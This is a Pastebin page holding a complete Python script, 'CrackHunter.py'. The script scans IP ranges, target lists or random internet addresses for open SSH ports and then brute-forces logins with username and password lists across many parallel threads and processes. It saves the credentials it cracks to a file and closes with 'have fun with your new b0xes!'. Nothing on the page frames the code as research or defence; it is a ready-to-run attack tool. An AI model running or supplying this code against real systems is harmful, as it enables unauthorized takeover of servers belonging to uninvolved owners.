API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Feb 23rd, 2020
602
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.81 KB | None | 0 0
raw download clone embed print report
  1.  
  2. #!/usr/bin/env python
  3.  
  4. from socket import *
  5. import multiprocessing
  6. import threading
  7. import time
  8. import paramiko
  9. import sys
  10. import os
  11. import logging
  12. import argparse
  13. import random
  14.  
  15.  
  16. def banner():
  17. print '--==[ CrackHunter.py ]==--'
  18.  
  19.  
  20. def version():
  21. print '[+] CrackHunter.py v1.0'
  22. exit(0)
  23.  
  24.  
  25. def test_file(filename):
  26. try:
  27. outfile = open(filename, 'a')
  28. outfile.close()
  29. except:
  30. print '[-] ERROR: Cannot write to file \'%s\'' % filename
  31. exit(1)
  32.  
  33.  
  34. def argspage():
  35. parser = argparse.ArgumentParser(
  36. usage='\n\n ./%(prog)s -i <arg> | -r <arg> | -I <arg>',
  37. formatter_class=argparse.RawDescriptionHelpFormatter,
  38. epilog=
  39. 'examples:\n\n' \
  40. \
  41. ' scanning and attacking random ips\n' \
  42. ' usage: ./%(prog)s -r 50 -L password.txt\n\n' \
  43. \
  44. ' scanning and attacking an ip-range\n' \
  45. ' usage: ./%(prog)s -i 192.168.0.1-254 -u admin -l troll\n\n' \
  46. \
  47. ' attack ips from file\n' \
  48. ' usage: ./%(prog)s -I ips.txt -L passwords.txt\n',
  49. add_help=False
  50. )
  51.  
  52. options = parser.add_argument_group('options', '')
  53. options.add_argument('-i', default=False, metavar='<ip/range>',
  54. help='ip-address/-range (e.g.: 192.168.0-3.1-254)')
  55. options.add_argument('-I', default=False, metavar='<file>',
  56. help='list of target ip-addresses')
  57. options.add_argument('-r', default=False, metavar='<num>',
  58. help='attack random hosts')
  59. options.add_argument('-p', default=22, metavar='<num>',
  60. help='port number of sshd (default: 22)')
  61. options.add_argument('-t', default=4, metavar='<num>',
  62. help='threads per host (default: 4)')
  63. options.add_argument('-f', default=8, metavar='<num>',
  64. help='attack max hosts parallel (default: 8)')
  65. options.add_argument('-u', default='root', metavar='<username>',
  66. help='single username (default: root)')
  67. options.add_argument('-U', default=False, metavar='<file>',
  68. help='list of usernames')
  69. options.add_argument('-l', default='toor', metavar='<password>',
  70. help='single password (default: toor)')
  71. options.add_argument('-L', default=False, metavar='<file>',
  72. help='list of passwords')
  73. options.add_argument('-o', default=False, metavar='<file>',
  74. help='write found logins to file')
  75. options.add_argument('-T', default=3, metavar='<sec>',
  76. help='timeout in seconds (default: 3)')
  77. options.add_argument('-V', action='store_true',
  78. help='print version of against.py and exit')
  79.  
  80. args = parser.parse_args()
  81.  
  82. if args.V:
  83. version()
  84.  
  85. if (args.i == False) and (args.I == False) and (args.r == False):
  86. print ''
  87. parser.print_help()
  88. exit(0)
  89.  
  90. return args
  91.  
  92.  
  93. def scan(target, port, timeout):
  94. s = socket(AF_INET, SOCK_STREAM)
  95. s.settimeout(timeout)
  96. result = s.connect_ex((target, port))
  97. s.close()
  98. if result == 0:
  99. HOSTLIST.append(target)
  100.  
  101.  
  102. def thread_scan(args, target):
  103. port = int(args.p)
  104. to = float(args.T)
  105. bam = threading.Thread(target=scan, args=(target, port, to,))
  106. bam.start()
  107. while threading.activeCount() > 200:
  108. time.sleep(0.0001)
  109. time.sleep(0.0001)
  110.  
  111.  
  112. def scan_output(i):
  113. sys.stdout.flush()
  114. sys.stdout.write('\r[*] hosts scanned: {0} | ' \
  115. 'possible to attack: {1}'.format(i, len(HOSTLIST)))
  116.  
  117.  
  118. def ip_range(args):
  119. targets = args.i
  120. a = tuple(part for part in targets.split('.'))
  121.  
  122. rsa = (range(4))
  123. rsb = (range(4))
  124. for i in range(0, 4):
  125. ga = a[i].find('-')
  126. if ga != -1:
  127. rsa[i] = int(a[i][:ga])
  128. rsb[i] = int(a[i][1 + ga:]) + 1
  129. else:
  130. rsa[i] = int(a[i])
  131. rsb[i] = int(a[i]) + 1
  132.  
  133. print '[*] scanning %s for ssh services' % targets
  134. m = 0
  135. for i in range(rsa[0], rsb[0]):
  136. for j in range(rsa[1], rsb[1]):
  137. for k in range(rsa[2], rsb[2]):
  138. for l in range(rsa[3], rsb[3]):
  139. target = '%d.%d.%d.%d' % (i, j, k, l)
  140. m += 1
  141. scan_output(m)
  142. thread_scan(args, target)
  143.  
  144. while threading.activeCount() > 1:
  145. time.sleep(0.1)
  146. scan_output(m)
  147. print '\n[*] finished scan.'
  148.  
  149.  
  150. def rand():
  151. return random.randrange(0, 256)
  152.  
  153.  
  154. def rand_ip(args):
  155. i = 0
  156. print '[*] scanning random ips for ssh services'
  157. while len(HOSTLIST) < int(args.r):
  158. target = '%d.%d.%d.%d' % (rand(), rand(), rand(), rand())
  159. i += 1
  160. scan_output(i)
  161. thread_scan(args, target)
  162.  
  163. while threading.activeCount() > 1:
  164. time.sleep(0.1)
  165. scan_output(i)
  166. print '\n[*] finished scan.'
  167.  
  168.  
  169. def file_exists(filename):
  170. try:
  171. open(filename).readlines()
  172. except IOError:
  173. print '[-] ERROR: cannot open file \'%s\'' % filename
  174. exit(1)
  175.  
  176.  
  177. def ip_list(ipfile):
  178. file_exists(ipfile)
  179. hosts = open(ipfile).readlines()
  180. for host in hosts:
  181. HOSTLIST.append(host)
  182.  
  183.  
  184. def write_logins(filename, login):
  185. outfile = open(filename, 'a')
  186. outfile.write(login)
  187. outfile.close()
  188.  
  189.  
  190. def crack(target, prt, user, passw, outfile, to, i):
  191. ssh = paramiko.SSHClient()
  192. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  193. user = user.replace('\n', '')
  194. passw = passw.replace('\n', '')
  195. try:
  196. ssh.connect(target, port=prt, username=user, password=passw, timeout=to)
  197. login = '[+] login found for %s | %s:%s' % (target, user, passw)
  198. print login
  199. if outfile:
  200. write_logins(outfile, login + '\n')
  201. ssh.close()
  202. os._exit(0)
  203. except paramiko.AuthenticationException:
  204. ssh.close()
  205. except:
  206. ssh.close()
  207. if i < 8:
  208. i += 1
  209. ra = random.uniform(0.2, 0.6)
  210. time.sleep(ra)
  211. crack(target, prt, user, passw, outfile, to, i)
  212. else:
  213. print '[-] too much timeouts - stopped attack against %s' % (target)
  214. os._exit(1)
  215.  
  216.  
  217. def thread_it(target, args):
  218. port = int(args.p)
  219. user = args.u
  220. userlist = args.U
  221. password = args.l
  222. passlist = args.L
  223. outfile = args.o
  224. to = float(args.T)
  225. threads = int(args.t)
  226.  
  227. if userlist:
  228. user = open(userlist).readlines()
  229. else:
  230. user = [user]
  231. if passlist:
  232. password = open(passlist).readlines()
  233. else:
  234. password = [password]
  235.  
  236. try:
  237. for us in user:
  238. for pw in password:
  239. Run = threading.Thread(target=crack, args=(target, port, us, pw,
  240. outfile, to, 0,))
  241. Run.start()
  242. while threading.activeCount() > threads:
  243. time.sleep(0.01)
  244. time.sleep(0.001)
  245.  
  246. while threading.activeCount() > 1:
  247. time.sleep(0.1)
  248. except KeyboardInterrupt:
  249. os._exit(1)
  250.  
  251.  
  252. def fork_it(args):
  253. threads = int(args.t)
  254. childs = int(args.f)
  255. len_hosts = len(HOSTLIST)
  256.  
  257. print '[*] attacking %d target(s)\n' \
  258. '[*] cracking up to %d hosts parallel\n' \
  259. '[*] threads per host: %d' % (len_hosts, childs, threads)
  260.  
  261. i = 1
  262. for host in HOSTLIST:
  263. host = host.replace('\n', '')
  264. print '[*] performing attacks against %s [%d/%d]' % (host, i, len_hosts)
  265. hostfork = multiprocessing.Process(target=thread_it,
  266. args=(host, args))
  267. hostfork.start()
  268. while len(multiprocessing.active_children()) >= childs:
  269. time.sleep(0.001)
  270. time.sleep(0.001)
  271. i += 1
  272. while multiprocessing.active_children():
  273. time.sleep(1)
  274.  
  275.  
  276. def empty_hostlist():
  277. if len(HOSTLIST) == 0:
  278. print '[-] found no targets to attack!'
  279. exit(1)
  280.  
  281.  
  282. def finished():
  283. print '[*] game over!!! have fun with your new b0xes!'
  284.  
  285.  
  286. def main():
  287. banner()
  288. args = argspage()
  289.  
  290. if args.U:
  291. file_exists(args.U)
  292. if args.L:
  293. file_exists(args.L)
  294. if args.o:
  295. test_file(args.o)
  296.  
  297. if args.i:
  298. ip_range(args)
  299. elif args.I:
  300. ip_list(args.I)
  301. else:
  302. rand_ip(args)
  303.  
  304. time.sleep(0.1)
  305. empty_hostlist()
  306. fork_it(args)
  307. finished()
  308.  
  309.  
  310. if __name__ == '__main__':
  311. HOSTLIST = []
  312. try:
  313. logging.disable(logging.CRITICAL)
  314. main()
  315. except KeyboardInterrupt:
  316. print '\nbye bye!!!'
  317. time.sleep(0.2)
  318. os._exit(1)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!